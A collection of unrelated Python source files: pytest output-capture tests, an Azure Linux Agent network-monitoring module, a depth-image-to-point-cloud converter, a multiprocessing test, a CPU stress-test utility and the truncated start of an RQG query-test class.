out2 = subprocess.check_output(("lsof", "-p", str(pid))).decode()
len1 = len([x for x in out.split("\n") if "REG" in x])
len2 = len([x for x in out2.split("\n") if "REG" in x])
assert len2 < len1 + 3, out2
class TestFDCapture:
def test_simple(self, tmpfile):
fd = tmpfile.fileno()
cap = capture.FDCapture(fd)
data = b"hello"
os.write(fd, data)
pytest.raises(AssertionError, cap.snap)
cap.done()
cap = capture.FDCapture(fd)
cap.start()
os.write(fd, data)
s = cap.snap()
cap.done()
assert s == "hello"
def test_simple_many(self, tmpfile):
for i in range(10):
self.test_simple(tmpfile)
def test_simple_many_check_open_files(self, testdir):
with lsof_check():
with testdir.makepyfile("").open("wb+") as tmpfile:
self.test_simple_many(tmpfile)
def test_simple_fail_second_start(self, tmpfile):
fd = tmpfile.fileno()
cap = capture.FDCapture(fd)
cap.done()
pytest.raises(AssertionError, cap.start)
def test_stderr(self):
cap = capture.FDCapture(2)
cap.start()
print("hello", file=sys.stderr)
s = cap.snap()
cap.done()
assert s == "hello\n"
def test_stdin(self):
cap = capture.FDCapture(0)
cap.start()
x = os.read(0, 100).strip()
cap.done()
assert x == b""
def test_writeorg(self, tmpfile):
data1, data2 = b"foo", b"bar"
cap = capture.FDCapture(tmpfile.fileno())
cap.start()
tmpfile.write(data1)
tmpfile.flush()
cap.writeorg(data2.decode("ascii"))
scap = cap.snap()
cap.done()
assert scap == data1.decode("ascii")
with open(tmpfile.name, "rb") as stmp_file:
stmp = stmp_file.read()
assert stmp == data2
def test_simple_resume_suspend(self):
with saved_fd(1):
cap = capture.FDCapture(1)
cap.start()
data = b"hello"
os.write(1, data)
sys.stdout.write("whatever")
s = cap.snap()
assert s == "hellowhatever"
cap.suspend()
os.write(1, b"world")
sys.stdout.write("qlwkej")
assert not cap.snap()
cap.resume()
os.write(1, b"but now")
sys.stdout.write(" yes\n")
s = cap.snap()
assert s == "but now yes\n"
cap.suspend()
cap.done()
pytest.raises(AssertionError, cap.suspend)
assert repr(cap) == (
"<FDCapture 1 oldfd={} _state='done' tmpfile={!r}>".format(
cap.targetfd_save, cap.tmpfile
)
)
# Should not crash with missing "_old".
assert repr(cap.syscapture) == (
"<SysCapture stdout _old=<UNSET> _state='done' tmpfile={!r}>".format(
cap.syscapture.tmpfile
)
)
def test_capfd_sys_stdout_mode(self, capfd):
assert "b" not in sys.stdout.mode
@contextlib.contextmanager
def saved_fd(fd):
new_fd = os.dup(fd)
try:
yield
finally:
os.dup2(new_fd, fd)
os.close(new_fd)
class TestStdCapture:
captureclass = staticmethod(StdCapture)
@contextlib.contextmanager
def getcapture(self, **kw):
cap = self.__class__.captureclass(**kw)
cap.start_capturing()
try:
yield cap
finally:
cap.stop_capturing()
def test_capturing_done_simple(self):
with self.getcapture() as cap:
sys.stdout.write("hello")
sys.stderr.write("world")
out, err = cap.readouterr()
assert out == "hello"
assert err == "world"
def test_capturing_reset_simple(self):
with self.getcapture() as cap:
print("hello world")
sys.stderr.write("hello error\n")
out, err = cap.readouterr()
assert out == "hello world\n"
assert err == "hello error\n"
def test_capturing_readouterr(self):
with self.getcapture() as cap:
print("hello world")
sys.stderr.write("hello error\n")
out, err = cap.readouterr()
assert out == "hello world\n"
assert err == "hello error\n"
sys.stderr.write("error2")
out, err = cap.readouterr()
assert err == "error2"
def test_capture_results_accessible_by_attribute(self):
with self.getcapture() as cap:
sys.stdout.write("hello")
sys.stderr.write("world")
capture_result = cap.readouterr()
assert capture_result.out == "hello"
assert capture_result.err == "world"
def test_capturing_readouterr_unicode(self):
with self.getcapture() as cap:
print("hxąć")
out, err = cap.readouterr()
assert out == "hxąć\n"
def test_reset_twice_error(self):
with self.getcapture() as cap:
print("hello")
out, err = cap.readouterr()
pytest.raises(ValueError, cap.stop_capturing)
assert out == "hello\n"
assert not err
def test_capturing_modify_sysouterr_in_between(self):
oldout = sys.stdout
olderr = sys.stderr
with self.getcapture() as cap:
sys.stdout.write("hello")
sys.stderr.write("world")
sys.stdout = capture.CaptureIO()
sys.stderr = capture.CaptureIO()
print("not seen")
sys.stderr.write("not seen\n")
out, err = cap.readouterr()
assert out == "hello"
assert err == "world"
assert sys.stdout == oldout
assert sys.stderr == olderr
def test_capturing_error_recursive(self):
with self.getcapture() as cap1:
print("cap1")
with self.getcapture() as cap2:
print("cap2")
out2, err2 = cap2.readouterr()
out1, err1 = cap1.readouterr()
assert out1 == "cap1\n"
assert out2 == "cap2\n"
def test_just_out_capture(self):
with self.getcapture(out=True, err=False) as cap:
sys.stdout.write("hello")
sys.stderr.write("world")
out, err = cap.readouterr()
assert out == "hello"
assert not err
def test_just_err_capture(self):
with self.getcapture(out=False, err=True) as cap:
sys.stdout.write("hello")
sys.stderr.write("world")
out, err = cap.readouterr()
assert err == "world"
assert not out
def test_stdin_restored(self):
old = sys.stdin
with self.getcapture(in_=True):
newstdin = sys.stdin
assert newstdin != sys.stdin
assert sys.stdin is old
def test_stdin_nulled_by_default(self):
print("XXX this test may well hang instead of crashing")
print("XXX which indicates an error in the underlying capturing")
print("XXX mechanisms")
with self.getcapture():
pytest.raises(OSError, sys.stdin.read)
class TestTeeStdCapture(TestStdCapture):
captureclass = staticmethod(TeeStdCapture)
def test_capturing_error_recursive(self):
r"""For TeeStdCapture since we passthrough stderr/stdout, cap1
should get all output, while cap2 should only get "cap2\n"."""
with self.getcapture() as cap1:
print("cap1")
with self.getcapture() as cap2:
print("cap2")
out2, err2 = cap2.readouterr()
out1, err1 = cap1.readouterr()
assert out1 == "cap1\ncap2\n"
assert out2 == "cap2\n"
class TestStdCaptureFD(TestStdCapture):
captureclass = staticmethod(StdCaptureFD)
def test_simple_only_fd(self, testdir):
testdir.makepyfile(
"""\
import os
def test_x():
os.write(1, b"hello\\n")
assert 0
"""
)
result = testdir.runpytest_subprocess()
result.stdout.fnmatch_lines(
"""
*test_x*
*assert 0*
*Captured stdout*
"""
)
def test_intermingling(self):
with self.getcapture() as cap:
os.write(1, b"1")
sys.stdout.write(str(2))
sys.stdout.flush()
os.write(1, b"3")
os.write(2, b"a")
sys.stderr.write("b")
sys.stderr.flush()
os.write(2, b"c")
out, err = cap.readouterr()
assert out == "123"
assert err == "abc"
def test_many(self, capfd):
with lsof_check():
for i in range(10):
cap = StdCaptureFD()
cap.start_capturing()
cap.stop_capturing()
class TestStdCaptureFDinvalidFD:
def test_stdcapture_fd_invalid_fd(self, testdir):
testdir.makepyfile(
"""
import os
from fnmatch import fnmatch
from _pytest import capture
def StdCaptureFD(out=True, err=True, in_=True):
return capture.MultiCapture(
in_=capture.FDCapture(0) if in_ else None,
out=capture.FDCapture(1) if out else None,
err=capture.FDCapture(2) if err else None,
)
def test_stdout():
os.close(1)
cap = StdCaptureFD(out=True, err=False, in_=False)
assert fnmatch(repr(cap.out), "<FDCapture 1 oldfd=* _state='initialized' tmpfile=*>")
cap.start_capturing()
os.write(1, b"stdout")
assert cap.readouterr() == ("stdout", "")
cap.stop_capturing()
def test_stderr():
os.close(2)
cap = StdCaptureFD(out=False, err=True, in_=False)
assert fnmatch(repr(cap.err), "<FDCapture 2 oldfd=* _state='initialized' tmpfile=*>")
cap.start_capturing()
os.write(2, b"stderr")
assert cap.readouterr() == ("", "stderr")
cap.stop_capturing()
def test_stdin():
os.close(0)
cap = StdCaptureFD(out=False, err=False, in_=True)
assert fnmatch(repr(cap.in_), "<FDCapture 0 oldfd=* _state='initialized' tmpfile=*>")
cap.stop_capturing()
"""
)
result = testdir.runpytest_subprocess("--capture=fd")
assert result.ret == 0
assert result.parseoutcomes()["passed"] == 3
def test_fdcapture_invalid_fd_with_fd_reuse(self, testdir):
with saved_fd(1):
os.close(1)
cap = capture.FDCaptureBinary(1)
cap.start()
os.write(1, b"started")
cap.suspend()
os.write(1, b" suspended")
cap.resume()
os.write(1, b" resumed")
assert cap.snap() == b"started resumed"
cap.done()
with pytest.raises(OSError):
os.write(1, b"done")
def test_fdcapture_invalid_fd_without_fd_reuse(self, testdir):
with saved_fd(1), saved_fd(2):
os.close(1)
os.close(2)
cap = capture.FDCaptureBinary(2)
cap.start()
os.write(2, b"started")
cap.suspend()
os.write(2, b" suspended")
cap.resume()
os.write(2, b" resumed")
assert cap.snap() == b"started resumed"
cap.done()
with pytest.raises(OSError):
os.write(2, b"done")
def test_capture_not_started_but_reset():
capsys = StdCapture()
capsys.stop_capturing()
def test_using_capsys_fixture_works_with_sys_stdout_encoding(capsys):
test_text = "test text"
print(test_text.encode(sys.stdout.encoding, "replace"))
(out, err) = capsys.readouterr()
assert out
assert err == ""
def test_capsys_results_accessible_by_attribute(capsys):
sys.stdout.write("spam")
sys.stderr.write("eggs")
capture_result = capsys.readouterr()
assert capture_result.out == "spam"
assert capture_result.err == "eggs"
def test_fdcapture_tmpfile_remains_the_same() -> None:
cap = StdCaptureFD(out=False, err=True)
try:
cap.start_capturing()
capfile = cap.err.tmpfile
cap.readouterr()
finally:
cap.stop_capturing()
capfile2 = cap.err.tmpfile
assert capfile2 == capfile
def test_close_and_capture_again(testdir):
testdir.makepyfile(
"""
import os
def test_close():
os.close(1)
def test_capture_again():
os.write(1, b"hello\\n")
assert 0
"""
)
result = testdir.runpytest_subprocess()
result.stdout.fnmatch_lines(
"""
*test_capture_again*
*assert 0*
*stdout*
*hello*
"""
)
@pytest.mark.parametrize(
"method", ["SysCapture(2)", "SysCapture(2, tee=True)", "FDCapture(2)"]
)
def test_capturing_and_logging_fundamentals(testdir, method: str) -> None:
# here we check a fundamental feature
p = testdir.makepyfile(
"""
import sys, os
import py, logging
from _pytest import capture
cap = capture.MultiCapture(
in_=None,
out=None,
err=capture.%s,
)
cap.start_capturing()
logging.warning("hello1")
outerr = cap.readouterr()
print("suspend, captured %%s" %%(outerr,))
logging.warning("hello2")
cap.pop_outerr_to_orig()
logging.warning("hello3")
outerr = cap.readouterr()
print("suspend2, captured %%s" %% (outerr,))
"""
% (method,)
)
result = testdir.runpython(p)
result.stdout.fnmatch_lines(
"""
suspend, captured*hello1*
suspend2, captured*WARNING:root:hello3*
"""
)
result.stderr.fnmatch_lines(
"""
WARNING:root:hello2
"""
)
assert "atexit" not in result.stderr.str()
def test_error_attribute_issue555(testdir):
testdir.makepyfile(
"""
import sys
def test_capattr():
assert sys.stdout.errors == "replace"
assert sys.stderr.errors == "replace"
"""
)
reprec = testdir.inline_run()
reprec.assertoutcome(passed=1)
@pytest.mark.skipif(
not sys.platform.startswith("win"), reason="only on windows",
)
def test_py36_windowsconsoleio_workaround_non_standard_streams() -> None:
"""
Ensure _py36_windowsconsoleio_workaround function works with objects that
do not implement the full ``io``-based stream protocol, for example execnet channels (#2666).
"""
from _pytest.capture import _py36_windowsconsoleio_workaround
class DummyStream:
def write(self, s):
pass
stream = cast(TextIO, DummyStream())
_py36_windowsconsoleio_workaround(stream)
def test_dontreadfrominput_has_encoding(testdir):
testdir.makepyfile(
"""
import sys
def test_capattr():
# should not raise AttributeError
assert sys.stdout.encoding
assert sys.stderr.encoding
"""
)
reprec = testdir.inline_run()
reprec.assertoutcome(passed=1)
def test_crash_on_closing_tmpfile_py27(testdir):
p = testdir.makepyfile(
"""
import threading
import sys
printing = threading.Event()
def spam():
f = sys.stderr
print('SPAMBEFORE', end='', file=f)
printing.set()
while True:
try:
f.flush()
except (OSError, ValueError):
break
def test_spam_in_thread():
t = threading.Thread(target=spam)
t.daemon = True
t.start()
printing.wait()
"""
)
# Do not consider plugins like hypothesis, which might output to stderr.
testdir.monkeypatch.setenv("PYTEST_DISABLE_PLUGIN_AUTOLOAD", "1")
result = testdir.runpytest_subprocess(str(p))
assert result.ret == 0
assert result.stderr.str() == ""
result.stdout.no_fnmatch_line("*OSError*")
def test_global_capture_with_live_logging(testdir):
# Issue 3819
# capture should work with live cli logging
# Teardown report seems to have the capture for the whole process (setup, capture, teardown)
testdir.makeconftest(
"""
def pytest_runtest_logreport(report):
if "test_global" in report.nodeid:
if report.when == "teardown":
with open("caplog", "w") as f:
f.write(report.caplog)
with open("capstdout", "w") as f:
f.write(report.capstdout)
"""
)
testdir.makepyfile(
"""
import logging
import sys
import pytest
logger = logging.getLogger(__name__)
@pytest.fixture
def fix1():
print("fix setup")
logging.info("fix setup")
yield
logging.info("fix teardown")
print("fix teardown")
def test_global(fix1):
print("begin test")
logging.info("something in test")
print("end test")
"""
)
result = testdir.runpytest_subprocess("--log-cli-level=INFO")
assert result.ret == 0
with open("caplog") as f:
caplog = f.read()
assert "fix setup" in caplog
assert "something in test" in caplog
assert "fix teardown" in caplog
with open("capstdout") as f:
capstdout = f.read()
assert "fix setup" in capstdout
assert "begin test" in capstdout
assert "end test" in capstdout
assert "fix teardown" in capstdout
@pytest.mark.parametrize("capture_fixture", ["capsys", "capfd"])
def test_capture_with_live_logging(testdir, capture_fixture):
# Issue 3819
# capture should work with live cli logging
testdir.makepyfile(
"""
import logging
import sys
logger = logging.getLogger(__name__)
def test_capture({0}):
print("hello")
sys.stderr.write("world\\n")
captured = {0}.readouterr()
assert captured.out == "hello\\n"
assert captured.err == "world\\n"
logging.info("something")
print("next")
logging.info("something")
captured = {0}.readouterr()
assert captured.out == "next\\n"
""".format(
capture_fixture
)
)
result = testdir.runpytest_subprocess("--log-cli-level=INFO")
assert result.ret == 0
def test_typeerror_encodedfile_write(testdir):
"""It should behave the same with and without output capturing (#4861)."""
p = testdir.makepyfile(
"""
def test_fails():
import sys
sys.stdout.write(b"foo")
"""
)
result_without_capture = testdir.runpytest("-s", str(p))
result_with_capture = testdir.runpytest(str(p))
assert result_with_capture.ret == result_without_capture.ret
out = result_with_capture.stdout.str()
assert ("TypeError: write() argument must be str, not bytes" in out) or (
"TypeError: unicode argument expected, got 'bytes'" in out
)
def test_stderr_write_returns_len(capsys):
"""Write on Encoded files, namely captured stderr, should return number of characters written."""
assert sys.stderr.write("Foo") == 3
def test_encodedfile_writelines(tmpfile: BinaryIO) -> None:
ef = capture.EncodedFile(tmpfile, encoding="utf-8")
with pytest.raises(TypeError):
ef.writelines([b"line1", b"line2"]) # type: ignore[list-item]
assert ef.writelines(["line3", "line4"]) is None # type: ignore[func-returns-value]
ef.flush()
tmpfile.seek(0)
assert tmpfile.read() == b"line3line4"
tmpfile.close()
with pytest.raises(ValueError):
ef.read()
def test__get_multicapture() -> None:
assert isinstance(_get_multicapture("no"), MultiCapture)
pytest.raises(ValueError, _get_multicapture, "unknown").match(
r"^unknown capturing method: 'unknown'"
)
def test_logging_while_collecting(testdir):
"""Issue #6240: Calls to logging.xxx() during collection causes all logging calls to be duplicated to stderr"""
p = testdir.makepyfile(
"""\
import logging
logging.warning("during collection")
def test_logging():
logging.warning("during call")
assert False
"""
)
result = testdir.runpytest_subprocess(p)
assert result.ret == ExitCode.TESTS_FAILED
result.stdout.fnmatch_lines(
[
"*test_*.py F*",
"====* FAILURES *====",
"____*____",
"*--- Captured log call*",
"WARNING * during call",
"*1 failed*",
]
)
result.stdout.no_fnmatch_line("*Captured stderr call*")
result.stdout.no_fnmatch_line("*during collection*")
|
env.py
|
# Microsoft Azure Linux Agent
#
# Copyright 2014 Microsoft Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Requires Python 2.4+ and Openssl 1.0+
#
import os
import socket
import time
import threading
import azurelinuxagent.common.conf as conf
import azurelinuxagent.common.logger as logger
from azurelinuxagent.common.dhcp import get_dhcp_handler
from azurelinuxagent.common.osutil import get_osutil
def get_env_handler():
return EnvHandler()
class EnvHandler(object):
"""
Monitor changes to dhcp and hostname.
If dhcp clinet process re-start has occurred, reset routes, dhcp with fabric.
Monitor scsi disk.
If new scsi disk found, set timeout
"""
def __init__(self):
self.osutil = get_osutil()
self.dhcp_handler = get_dhcp_handler()
self.stopped = True
self.hostname = None
self.dhcpid = None
self.server_thread = None
self.dhcp_warning_enabled = True
def run(self):
if not self.stopped:
logger.info("Stop existing env monitor service.")
self.stop()
self.stopped = False
logger.info("Start env monitor service.")
self.dhcp_handler.conf_routes()
self.hostname = socket.gethostname()
self.dhcpid = self.osutil.get_dhcp_pid()
self.server_thread = threading.Thread(target = self.monitor)
self.server_thread.setDaemon(True)
self.server_thread.start()
def monitor(self):
"""
Monitor dhcp client pid and hostname.
If dhcp clinet process re-start has occurred, reset routes.
"""
while not self.stopped:
self.osutil.remove_rules_files()
timeout = conf.get_root_device_scsi_timeout()
if timeout is not None:
self.osutil.set_scsi_disks_timeout(timeout)
if conf.get_monitor_hostname():
self.handle_hostname_update()
self.handle_dhclient_restart()
time.sleep(5)
def handle_hostname_update(self):
curr_hostname = socket.gethostname()
if curr_hostname != self.hostname:
logger.info("EnvMonitor: Detected host name change: {0} -> {1}",
self.hostname, curr_hostname)
self.osutil.set_hostname(curr_hostname)
self.osutil.publish_hostname(curr_hostname)
self.hostname = curr_hostname
def handle_dhclient_restart(self):
if self.dhcpid is None:
if self.dhcp_warning_enabled:
logger.warn("Dhcp client is not running. ")
self.dhcpid = self.osutil.get_dhcp_pid()
# disable subsequent error logging
self.dhcp_warning_enabled = self.dhcpid is not None
return
#The dhcp process hasn't changed since last check
if self.osutil.check_pid_alive(self.dhcpid.strip()):
return
newpid = self.osutil.get_dhcp_pid()
if newpid is not None and newpid != self.dhcpid:
logger.info("EnvMonitor: Detected dhcp client restart. "
"Restoring routing table.")
self.dhcp_handler.conf_routes()
self.dhcpid = newpid
def stop(self):
"""
Stop server comminucation and join the thread to main thread.
"""
self.stopped = True
if self.server_thread is not None:
self.server_thread.join()
|
IPA_image2pc.py
|
import numpy as np
import cv2
import json
import os
import h5py
from multiprocessing import Process
def perspectiveDepthImageToPointCloud(image_depth,image_rgb, seg, gt_path,defaultValue,perspectiveAngle,clip_start,clip_end,resolutionX,resolutionY,resolution_big,pixelOffset_X_KoSyTopLeft,pixelOffset_Y_KoSyTopLeft):
'''
Input: Depth image in perspective projection
Output: Point cloud as list (in meter)
Parameter:
- image_depth: Depth image in perspective projection with shape (resolutionY,resolutionX,1)
- defaultValue: Default value to indicate missing depth information in the depth image
- perspectiveAngle: Perspective angle in deg
- clip_start: Near clipping plane in meter
- clip_end: Far clipping plane in meter
- resolutionX: resolutionX of the input image
- resolutionY: resolutionY of the input image
- resolution_big: resolution_big of the input image
- pixelOffset_X_KoSyTopLeft: Offset in x direction in pixel from coordinate system top left
- pixelOffset_Y_KoSyTopLeft: Offset in y direction in pixel from coordinate system top left
'''
print('resolutionY,resolutionX',resolutionY,resolutionX)
print('image_depth',image_depth.shape)
assert(image_depth.shape==(resolutionY,resolutionX,1))
# print('resolutionY,resolutionX',resolutionY,resolutionX)
# Warning: Point cloud will not be correct when depth image was resized!
image_big=np.zeros((resolution_big,resolution_big))
image_big[pixelOffset_Y_KoSyTopLeft:pixelOffset_Y_KoSyTopLeft+resolutionY,pixelOffset_X_KoSyTopLeft:pixelOffset_X_KoSyTopLeft+resolutionX]=image_depth[:,:,0]
image_depth=image_big
image_depth=np.rot90(image_depth,k=2,axes=(0,1))
# image_rgb = np.rot90(image_rgb, k=2, axes=(0,1))
seg_big=np.zeros((resolution_big,resolution_big))
seg_big[pixelOffset_Y_KoSyTopLeft:pixelOffset_Y_KoSyTopLeft+resolutionY,pixelOffset_X_KoSyTopLeft:pixelOffset_X_KoSyTopLeft+resolutionX]= seg[:,:,0]
seg=seg_big
seg = np.rot90(seg, k=2, axes=(0,1))
print(image_rgb.shape)
point_cloud=[]
transforms = []
range_=clip_end-clip_start
print('gt_path',gt_path)
with open(gt_path,'r',encoding='utf8')as fp:
# json_data = json.load(fp)
gt_info = json.load(fp)
# Loop over all pixels in the depth image:
# print('image_depth.shape',image_depth.shape)
for j in range(image_depth.shape[0]):
for i in range(image_depth.shape[1]):
if image_depth[j,i]==defaultValue or image_depth[j,i]==0:
# print('no depth')
continue
# r = image_rgb[j,i,0]
# g = image_rgb[j,i,1]
# b = image_rgb[j,i,2]
label = seg[j,i]
seg_id = int(label)-1
if label == 255 or label == 0:
continue
world_z=(image_depth[j,i]*range_+clip_start)
# Calculate the orthogonal size based on current depth (function of z value)
orthoSizeZ_x=np.tan(np.deg2rad(perspectiveAngle/2))*world_z*2*resolutionX/resolution_big
orthoSizeZ_y=np.tan(np.deg2rad(perspectiveAngle/2))*world_z*2*resolutionY/resolution_big
meterPerPixel_x=orthoSizeZ_x/resolutionX
meterPerPixel_y=orthoSizeZ_y/resolutionY
world_x=(i+0.5-resolution_big/2)*meterPerPixel_x
world_y=(j+0.5-resolution_big/2)*meterPerPixel_y
# print('seg_id',seg_id)
t = gt_info[seg_id]['t']
t = np.array(t).reshape(-1)
rotation = gt_info[seg_id]['R']
rotation = np.array(rotation).reshape(-1)
# print(rotation)
# rotation = rotation.reshape(-1)
visib = 1.0 - gt_info[seg_id]['occlusion_rate']
# p=[world_x,world_y,world_z,r,g,b,rotation,t,visib,label]
# r = [ _r,for _r in rotation]
# t = [_t, for _t in t]
trans = np.concatenate((rotation,t))
# p=[world_x,world_y,world_z,r,g,b,visib,label]
p=[world_x,world_y,world_z,label]
transforms.append(trans)
point_cloud.append(p)
return point_cloud, transforms
part_dir = './IPARingScrew_part_1/'
with open(part_dir+'parameter.json', 'r') as f:
parameter = json.load(f)
print(parameter)
cycle_ = parameter['number_cycles']
drop_ = parameter['shapeDropLimit']
defaultValue = -1
perspectiveAngle = parameter['perspectiveAngle']
clip_start = parameter['clip_start']
clip_end = parameter['clip_end']
resolutionX = parameter['resolutionX']
resolutionY = parameter['resolutionY']
resolution_big = parameter['resolution_big']
pixelOffset_X_KoSyTopLeft = parameter['pixelOffset_X_KoSyTopLeft']
pixelOffset_Y_KoSyTopLeft = parameter['pixelOffset_Y_KoSyTopLeft']
NUM_POINT = 4096
data_dtype = 'float32'
label_dtype = 'int32'
def process_data(data_range):
for c in range(data_range[0], data_range[1]):
for d in range(10,drop_+1):
# if os.path.exists('./SileaneBunny/pointcloud/%04d_%03d.txt'%(c,d)):
# continue
depth = cv2.imread(part_dir+"p_depth/cycle_%04d/%03d_depth_uint16.png"%(c,d))
# print('depth',depth.shape)
depth = depth[:,:,0:1]
depth=np.array(depth,dtype='float')
depth /= 255
RGB = cv2.imread(part_dir+"p_rgb/cycle_%04d/%03d_rgb.png"%(c,d),-1)
seg = cv2.imread(part_dir+"p_segmentation/cycle_%04d/%03d_segmentation.png"%(c,d),-1)
print('depth',seg,seg.shape)
seg = seg.reshape([512,512,-1])
# seg = seg.reshape([474,506,-1])
# seg = seg.reshape([1018,1178,-1])
# defaultValue = 0
# perspectiveAngle = 0
# clip_start = 0
# clip_end = 0
gt_path = part_dir+"gt/cycle_%04d/%03d.json"%(c,d)
# print('gt_path',gt_path)
point_cloud , transforms = perspectiveDepthImageToPointCloud(depth,RGB,seg, gt_path, defaultValue,perspectiveAngle,clip_start,clip_end,resolutionX,resolutionY,resolution_big,pixelOffset_X_KoSyTopLeft,pixelOffset_Y_KoSyTopLeft)
# print(point_cloud)
np.savetxt('./IPARingScrew_part_1/train_pointcloud/%04d_%03d.txt'%(c,d), point_cloud, fmt='%0.6f')
TRAINING_DATA_NUM = 10
MAX_PROCESS = 1
if __name__ == '__main__':
# process_data([0,250])
data_per_process = int(TRAINING_DATA_NUM/MAX_PROCESS)
total_data_range = []
for i in range(MAX_PROCESS - 1):
data_range = [i*data_per_process, (i+1)*data_per_process]
total_data_range.append(data_range)
total_data_range.append([(MAX_PROCESS - 1)*data_per_process, TRAINING_DATA_NUM])
procs = []
for index, data_range in enumerate(total_data_range):
proc = Process(target = process_data, args = (data_range,))
procs.append(proc)
proc.start()
for proc in procs:
proc.join()
|
test-multiprocess.py
|
import os
import traceback
import time
import numpy as np
import multiprocessing
class detCalculator(multiprocessing.Process):
def __init__(self, ID, matSize, noChildren, levelsLeft, parent_pipe):
multiprocessing.Process.__init__(self)
self.ID = ID
self.parent_pipe = parent_pipe
self.mat = np.random.uniform(size=(matSize, matSize))
self.children = []
self.pipes = []
print("created node " + self.ID + ":, pid=" + str(os.getpid()))
if levelsLeft:
for chNo in range(noChildren):
chID = self.ID + str(chNo+1)
parent_end, child_end = multiprocessing.Pipe()
chP = multiprocessing.Process( target=detCalculator, args=(chID, matSize, noChildren, levelsLeft-1, child_end) )
self.children.append( chP )
self.pipes.append( parent_end )
chP.start()
def run(self):
while True:
print("Node " + self.ID + ": " + "running the loop")
try:
msg = self.parent_pipe.recv()
print("Node " + self.ID + ": " + msg)
for ch in self.children:
print("ch:" + ": pid=" + str(ch.pid))
for ch_pipe in self.pipes:
ch_pipe.send(msg)
print("sending message")
except:
print("error")
traceback.print_exc()
break
print("outside of the loop")
return
# def run(self):
# data = []
# while True:
# try:
# msg = self.parent_pipe.recv()
# if msg is None:
# self.kill_children()
# elif msg=="getDet":
# data.append( (self.ID, np.linalg.det(self.mat)) )
# Nremain = len(self.children)
# while Nremain:
# if not self.q.empty():
# q.get()
# Nremain = Nremain - 1
# data.extend(chData)
# for ch_pipe in self.pipes:
# ch_pipe.send(msg)
# self.parent_pipe.send( data )
# except EOFError:
# break
if __name__=='__main__':
matSize = 100
noChildren=2
levels = 1
conn1, conn2 = multiprocessing.Pipe()
newCalc = detCalculator('r', matSize, noChildren, levels, conn2)
newCalc.start()
conn1.send("getDet")
|
cpu.py
|
import os
import sys
import time
from multiprocessing import Process
from threading import Thread
from psutil import cpu_percent
class CPUStress:
"""`Controller <https://git.io/J9cXV>`__ for CPU stress using multiprocessing. Gets duration as user input.
>>> CPUStress
CPU is stressed using `multiprocessing.Process <https://docs.python.org/3/library/multiprocessing.html#
the-process-class>`__ to run the infinite loop on each process.
Args:
seconds:
- The number of seconds for which the CPU has to be stressed. Defaults to five times the number of cores.
Warnings:
- CPU stress is induced in real time.
- A relatively low performing machine may stall when stress is induced for a long duration.
References:
>>> CPUStress._infinite()
Triggers an infinite loop for the number of logical cores.
>>> CPUStress._measure_cpu()
Measures the impact on each logical core in a dedicated thread.
"""
CORES = os.cpu_count()
def __init__(self, seconds: int = CORES * 5):
self.seconds = seconds
self.start_time = None
def _infinite(self) -> None:
"""Infinite loop to stress each core on the CPU for the number of logical cores available.
See Also:
The loop runs on each core as this function is triggered by ``processing.Process`` that runs as a loop.
"""
while True:
try:
for _ in range(self.CORES):
pass
except KeyboardInterrupt:
return
def _measure_cpu(self) -> None:
r"""Uses ``cpu_percent()`` to get the current CPU utilization and print the utilization percentage on each core.
Runs in a forever loop. Stops when the flag ``stop_thread`` is set to ``True``.
"""
# noinspection PyGlobalUndefined
global stop_thread
processors = []
while True:
cpu_util = cpu_percent(interval=1, percpu=True)
processors.append(cpu_util) # stores the list of usage % as a list within a list
output = ''
for index, percent in enumerate(cpu_util):
output += f'Core {index + 1}: {percent}%\t'
sys.stdout.write(f'\r{output.strip()}')
if stop_thread:
break
sys.stdout.flush()
sys.stdout.write('\r')
processors = map(list, zip(*processors))
processors = [max(processor) for processor in processors]
processors = list(enumerate(processors))
processors = sorted(processors, key=lambda x: x[1], reverse=True)
if self.start_time and (run_time := round(time.time() - self.start_time)):
if (stop_when := self.seconds - run_time) and stop_when > 0:
print(f'Actual runtime: {run_time} seconds. Stopped {stop_when} seconds early.')
else:
print('Stress Test was stopped before it began.')
print('CPU Usage Report:')
[print(f'Core {processor + 1} - {self._format_number(usage)}%') for processor, usage in processors]
@classmethod
def _format_number(cls, n: float) -> int:
"""Converts numbers with float value .0 to integers.
Args:
n: Raw numbers which is either a `str` or `float`
Returns:
int:
Processed integers without any float value extensions in it.
"""
return int(n) if isinstance(n, float) and n.is_integer() else n
def run(self) -> None:
"""Initiator for stress injector.
Methods:
infinite: To kick off stress injector.
measure: To measure the usage in the background running in a dedicated thread.
"""
# noinspection PyGlobalUndefined
global stop_thread
try:
sys.stdout.write(f'\rStressing CPU cores for {self.seconds} seconds')
processes = []
for n in range(self.CORES):
processes.append(Process(target=self._infinite))
stop_thread = False
measure = Thread(target=self._measure_cpu)
measure.start()
time.sleep(1)
self.start_time = time.time()
[each_core.start() for each_core in processes]
time.sleep(self.seconds)
[each_core.terminate() for each_core in processes]
[each_core.join() for each_core in processes]
time.sleep(1)
stop_thread = True
measure.join()
except KeyboardInterrupt:
sys.stdout.write('\rManual interrupt received. Stopping stress.')
stop_thread = True
if __name__ == '__main__':
CPUStress(seconds=60).run()
|
new_test_rqg.py
|
from base_test_rqg import BaseRQGTests
from new_rqg_mysql_client import RQGMySQLClientNew
from new_rqg_query_helper import RQGQueryHelperNew
import threading
from rqg_mysql_client import RQGMySQLClient
from rqg_postgres_client import RQGPostgresClient
import traceback
class RQGTestsNew(BaseRQGTests):
''' Call of super class setUp() function with defining new input parameter: test_name.
This parameter will be used in dispatcher function to identify desired transformation logic. '''
def setUp(self):
super(RQGTestsNew, self).setUp()
self.test_name = self.input.param("test_name", "")
self.debug_logging = self.input.param("debug_logging", True)
self.use_new_rqg = self.input.param("use_new_rqg", False)
def tearDown(self):
super(RQGTestsNew, self).tearDown()
def test_rqg(self):
super(RQGTestsNew, self).test_rqg()
def _rqg_worker(self, table_name, table_map, input_queue, result_queue, failure_record_queue=None):
count = 0
while True:
if self.total_queries <= self.query_count:
break
if not input_queue.empty():
data = input_queue.get()
start_test_case_number = data["start_test_case_number"]
query_template_list = data["query_template_list"]
# create strings for queries and indexes but doesnt send indexes to Couchbase
query_input_list = []
self.query_helper.debug_logging = self.debug_logging
conversion_func = self.query_helper._get_conversion_func(self.test_name)
conversion_map = {'table_name': str(table_name), "table_map": table_map, 'database_name': self.database}
